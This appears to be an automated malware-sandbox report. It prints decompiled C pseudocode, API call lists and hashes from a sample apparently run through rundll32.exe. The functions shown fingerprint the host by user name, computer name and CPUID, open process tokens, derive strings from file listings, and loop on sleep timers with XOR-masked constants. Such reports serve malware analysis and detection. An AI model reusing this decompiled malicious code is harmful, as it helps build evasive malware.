0x00f94de1
0x00f94deb
0x00f94df2
0x00f94df5
0x00f94df7
0x00f94dff
0x00f94e04
0x00f94e12
0x00f94e17
0x00f94e21

APIs

lstrlenW.KERNEL32(004F0053,74E05520,?,00000008,040A932C,?,00F94ABB,004F0053,040A932C,?,?,?,?,?,?,00F91BD5), ref: 00F94DD8
lstrlenW.KERNEL32(00F94ABB,?,00F94ABB,004F0053,040A932C,?,?,?,?,?,?,00F91BD5), ref: 00F94DDF

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00F94ABB,004F0053,040A932C,?,?,?,?,?,?,00F91BD5), ref: 00F94DFF
memcpy.NTDLL(74E069A0,00F94ABB,00000002,00000000,004F0053,74E069A0,?,?,00F94ABB,004F0053,040A932C), ref: 00F94E12

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: bfc2517c329c7f679a6f55351d13d57fe8cfcabe792e51ceb0415b1abf8074b8
Instruction ID: b956f6625b4a63d7ef8c77e83fdf412bf952509b251654ea1de1a89418622370
Opcode Fuzzy Hash: bfc2517c329c7f679a6f55351d13d57fe8cfcabe792e51ceb0415b1abf8074b8
Instruction Fuzzy Hash: BBF04F36900118BFDF11EFA8CC45C9E7BACEF083547014062FE04D7111E775EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F92829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(040A887A,00000000,00000000,00000000,00F96328,00000000), ref: 00F92839
lstrlen.KERNEL32(?), ref: 00F92841

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

lstrcpy.KERNEL32(00000000,040A887A), ref: 00F92855
lstrcat.KERNEL32(00000000,?), ref: 00F92860

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f0e7b8f5c3f6267a760401d2a85dd1829132b4e0064b6c6b3e3f7f51799b3160
Instruction ID: c329bb2359ce6aaf5f931543ccbc6063ce2dac0d6264f93f9c0fd4c4d0cbe9b8
Opcode Fuzzy Hash: f0e7b8f5c3f6267a760401d2a85dd1829132b4e0064b6c6b3e3f7f51799b3160
Instruction Fuzzy Hash: 60E092739052286787225FB99C48C9FBBACEFC9661305041BFA10D3120C7648805ABE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2316 Parent PID: 5268 rundll32.exeCOMMON

Executed Functions

Function 01374E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01374E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x137a2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x137a290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x137a2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x137a290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x137a290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x137a2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x137a2d0; // 0x666d5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x137b825; // 0x73797325
				_t83 = E01371000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x137a290, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x137a2d0; // 0x666d5a8
				_t16 = _t93 + 0x137b846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x01374ea5
0x01374eab
0x01374ead
0x01374ec7
0x01374ecb
0x01374ece
0x01375143
0x0137514a
0x0137514a
0x01374ed4
0x01374ee9
0x01374eeb
0x01374eef
0x01374ef2
0x01375133
0x0137513d
0x00000000
0x0137513d
0x01374ef8
0x01374f03
0x01374f08
0x01374f0d
0x01374f10
0x01374f17
0x01374f1e
0x01374f21
0x01375123
0x0137512d
0x00000000
0x0137512d
0x01374f37
0x01374f3b
0x01374f3e
0x01374f41
0x01374f49
0x01374f4c
0x01374f55
0x01374f5b
0x01374f65
0x01374f6c
0x01374f6c
0x01374f7e
0x01374f89
0x01374f97
0x01374f9c
0x01374fa1
0x01374fa4
0x01374fa9
0x01374fb3
0x01374fb6
0x01374fb9
0x01374fcf
0x01374fd3
0x01374fd6
0x01375121
0x00000000
0x01375121
0x01374fed
0x0137503e
0x01375001
0x01375009
0x0137500e
0x0137501c
0x01375025
0x0137502e
0x0137502e
0x0137503c
0x0137503c
0x01375042
0x01375046
0x01375046
0x0137504c
0x00000000
0x00000000
0x0137504e
0x01375054
0x013750fb
0x013750fe
0x0137510b
0x0137510b
0x0137510f
0x00000000
0x00000000
0x01375104
0x01375108
0x01375108
0x0137510a
0x0137510a
0x01375114
0x0137511b
0x0137511d
0x00000000
0x0137511d
0x0137505a
0x0137505c
0x0137505c
0x0137506f
0x01375075
0x01375080
0x01375082
0x01375086
0x01375088
0x01375088
0x0137508d
0x0137508f
0x0137508f
0x0137508d
0x01375094
0x01375098
0x01375098
0x013750a8
0x013750ad
0x013750b0
0x013750b0
0x013750b3
0x013750bd
0x013750c5
0x013750ca
0x013750d8
0x013750d8
0x013750ec
0x013750f0
0x013750f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,0137A380), ref: 01374EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 01374EE9
memset.NTDLL ref: 01374F03

Part of subcall function 01371000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,01374F1C,73797325), ref: 01371011
Part of subcall function 01371000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0137102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 01374F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01374F55
CloseHandle.KERNEL32(?), ref: 01374F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01374F78
lstrcat.KERNEL32(?,642E2A5C), ref: 01374FB9
FindFirstFileA.KERNELBASE(?,?), ref: 01374FCF
CompareFileTime.KERNEL32(?,?), ref: 01374FED
FindNextFileA.KERNELBASE(01373EAC,?), ref: 01375001
FindClose.KERNEL32(01373EAC), ref: 0137500E
FindFirstFileA.KERNEL32(?,?), ref: 0137501A
CompareFileTime.KERNEL32(?,?), ref: 0137503C
StrChrA.SHLWAPI(?,0000002E), ref: 0137506F
memcpy.NTDLL(01372779,?,00000000), ref: 013750A8
FindNextFileA.KERNELBASE(01373EAC,?), ref: 013750BD
FindClose.KERNEL32(01373EAC), ref: 013750CA
FindFirstFileA.KERNEL32(?,?), ref: 013750D6
CompareFileTime.KERNEL32(?,?), ref: 013750E6
FindClose.KERNELBASE(01373EAC), ref: 0137511B
HeapFree.KERNEL32(00000000,01372779,73797325), ref: 0137512D
HeapFree.KERNEL32(00000000,?), ref: 0137513D

Strings

Ut, xrefs: 0137512D, 0137513D

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: Ut
API String ID: 455834338-8415677
Opcode ID: ba8f06c2dfcd81aa837ef0b1fbabe65da38f37ebb4a0ee4429ef54e4978fca5c
Instruction ID: f38df41e947b646f175ea77686ba32338586b87efc43794a8cf2b1058e2133cd
Opcode Fuzzy Hash: ba8f06c2dfcd81aa837ef0b1fbabe65da38f37ebb4a0ee4429ef54e4978fca5c
Instruction Fuzzy Hash: 81813971900119AFDF32DFA9DC84AEEBBBDFB48304F14016AE505E6254E7759A44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01373CA1, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01373CA1(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E01375C4E(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E01372A03(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x01373cae
0x01373caf
0x01373cb0
0x01373cb1
0x01373cb2
0x01373cb6
0x01373cbd
0x01373ccc
0x01373ccf
0x01373cd2
0x01373cd9
0x01373cdc
0x01373cdf
0x01373ce2
0x01373ce5
0x01373cf0
0x01373cf2
0x01373cfb
0x01373d03
0x01373d05
0x01373d17
0x01373d21
0x01373d25
0x01373d34
0x01373d38
0x01373d41
0x01373d49
0x01373d49
0x01373d4b
0x01373d4b
0x01373d53
0x01373d59
0x01373d5d
0x01373d5d
0x01373d68

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01373CE8
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 01373CFB
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 01373D17

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 01373D34
memcpy.NTDLL(00000000,00000000,0000001C), ref: 01373D41
NtClose.NTDLL(00000000), ref: 01373D53
NtClose.NTDLL(00000000), ref: 01373D5D

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: ee135079c97397dc2d8251eb0b9c500f729632fc553b31309ccfdbf6fbb0b451
Instruction ID: 809ebe4b81cbec8889287ef120b6c2f504a7a9d58d6e01be400d2d1138199e2c
Opcode Fuzzy Hash: ee135079c97397dc2d8251eb0b9c500f729632fc553b31309ccfdbf6fbb0b451
Instruction Fuzzy Hash: 362103B2900219BBDB21AFA9DC44ADEBFBDFF08754F104126FA01A6120D7758A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01371B47, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E01371B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x137a298);
					_v20 = 0;
					_v16 = 0;
					L01377F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x137a2c4; // 0x328
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E01374A3C(_t74) != 0) {
							 *0x137a2a4 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x137a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E0137243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E01377289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x137a29c);
							goto L21;
						} else {
							__eflags =  *0x137a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E01372813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x137a2a0);
								L21:
								L01377F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x137a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x01371b47
0x01371b59
0x01371b5c
0x01371b68
0x01371b70
0x01371b73
0x01371cd9
0x01371b79
0x01371b79
0x01371b7b
0x01371b80
0x01371b81
0x01371b87
0x01371b8a
0x01371b8d
0x01371b9b
0x01371ba6
0x01371ba9
0x01371bab
0x01371bb8
0x01371bc2
0x01371bc6
0x01371bc9
0x01371bce
0x01371bd9
0x01371bd9
0x01371be3
0x00000000
0x01371be6
0x01371bea
0x01371bf5
0x01371bf5
0x01371bfc
0x01371c01
0x01371c08
0x01371c11
0x01371c17
0x01371c1a
0x01371c21
0x01371c24
0x00000000
0x00000000
0x01371c26
0x01371c29
0x01371c2c
0x01371c2f
0x00000000
0x01371c31
0x01371c40
0x01371c40
0x00000000
0x01371c6e
0x01371c6e
0x01371c73
0x01371c92
0x01371c94
0x01371c99
0x01371c9a
0x00000000
0x01371c75
0x01371c75
0x01371c7b
0x00000000
0x01371c7d
0x01371c7d
0x01371c82
0x01371c84
0x01371c89
0x01371c8a
0x01371ca0
0x01371ca0
0x01371ca8
0x01371cb3
0x01371cb6
0x01371cc1
0x01371cc3
0x01371cc5
0x01371cc8
0x00000000
0x01371cce
0x00000000
0x01371cce
0x01371cc8
0x01371c7b
0x00000000
0x01371c73
0x01371c43
0x01371c45
0x01371c48
0x01371c49
0x01371c49
0x01371c4d
0x01371c57
0x01371c57
0x01371c5d
0x01371c60
0x01371c60
0x01371c66
0x01371c66
0x01371ce3
0x00000000

APIs

memset.NTDLL ref: 01371B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01371B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 01371B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01371BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01371BC2
HeapFree.KERNEL32(00000000,00000000), ref: 01371C57
CloseHandle.KERNEL32(?), ref: 01371C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01371CA0
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,01372F7D), ref: 01371CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01371CC1

Part of subcall function 01374A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,079E9370,?,00000000,30314549,00000014,004F0053,079E932C), ref: 01374B28
Part of subcall function 01374A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01371BD5), ref: 01374B3A

GetLastError.KERNEL32 ref: 01371CD3

Strings

Ut, xrefs: 01371C57

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: 80ccc8b347bea14617dd5b24464fd6cd1f6156739b4df69ac7587b3a6735171b
Instruction ID: acd7cca89f1e966bd0cdbaa60f415471017dbb9a7a5df198c195591abfccf882
Opcode Fuzzy Hash: 80ccc8b347bea14617dd5b24464fd6cd1f6156739b4df69ac7587b3a6735171b
Instruction Fuzzy Hash: 46515C72805229AADF319FD8DC44DEEBFBCEF09768F144116E914B2184D7799644CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01373946, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E01373946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x137a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0137354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x137a2cc ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x137a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E01373F12(_v8 + _v8, _t63);
							}
							HeapFree( *0x137a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x137a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E01373F12(_v8 + _v8, _t63);
						}
						HeapFree( *0x137a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x01373946
0x0137394e
0x01373954
0x01373957
0x0137395a
0x0137395c
0x01373961
0x01373961
0x01373967
0x01373969
0x01373976
0x013739d7
0x01373978
0x0137397d
0x01373983
0x01373988
0x01373996
0x0137399a
0x013739a9
0x013739b0
0x013739b7
0x013739b7
0x013739c2
0x013739c2
0x0137399a
0x01373988
0x013739d9
0x013739df
0x013739e9
0x013739eb
0x013739f0
0x013739ff
0x01373a03
0x01373a0e
0x01373a15
0x01373a1c
0x01373a1c
0x01373a28
0x01373a28
0x01373a03
0x01373a31
0x01373a33
0x01373a36
0x01373a38
0x01373a3b
0x01373a3e
0x01373a48
0x01373a4c
0x01373a50

APIs

GetUserNameW.ADVAPI32(00000000,01372F3F), ref: 0137397D
RtlAllocateHeap.NTDLL(00000000,01372F3F), ref: 01373994
GetUserNameW.ADVAPI32(00000000,01372F3F), ref: 013739A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,01372F3F,?,?,?,?,?,013744F9,?,00000001), ref: 013739C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 013739E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 013739FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 01373A0A
HeapFree.KERNEL32(00000000,00000000), ref: 01373A28

Strings

Ut, xrefs: 013739C2, 01373A28

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: c2f877340857ad4162a347069597dbd8c25b0ac737c5756091360de278ab32a0
Instruction ID: 77c3b955fa53bf1350ed56f996e9fe5339f4114f1de26e4a58d0b2667e93fffa
Opcode Fuzzy Hash: c2f877340857ad4162a347069597dbd8c25b0ac737c5756091360de278ab32a0
Instruction Fuzzy Hash: B231E571A14209EFEB31EFA9D881A6EBBF9FB48714F144429E545E3210DB34AA04AB10

Uniqueness

Uniqueness Score: -1.00%

Function 01374430, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01374430(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x137a290 = _t14;
				if(_t14 != 0) {
					 *0x137a180 = GetTickCount();
					_t16 = E01372A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L013780B2();
						_t40 = _t18 + _t20;
						_t22 = E01373F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x137a2ac; // 0x32c
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x137a2b8 = 1; // executed
						}
					}
					_t16 = E01372D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x01374430
0x01374445
0x0137444d
0x01374452
0x01374465
0x0137446a
0x01374471
0x013744f9
0x013744ff
0x00000000
0x00000000
0x00000000
0x01374477
0x01374477
0x0137447c
0x01374482
0x01374488
0x01374492
0x01374496
0x01374497
0x0137449c
0x0137449d
0x0137449e
0x013744a3
0x013744a9
0x013744b2
0x013744b8
0x013744be
0x013744c3
0x013744ca
0x013744ce
0x013744d6
0x013744de
0x013744e0
0x013744e0
0x013744e8
0x013744ea
0x013744ea
0x013744e8
0x013744f4
0x00000000
0x013744f4
0x01374456
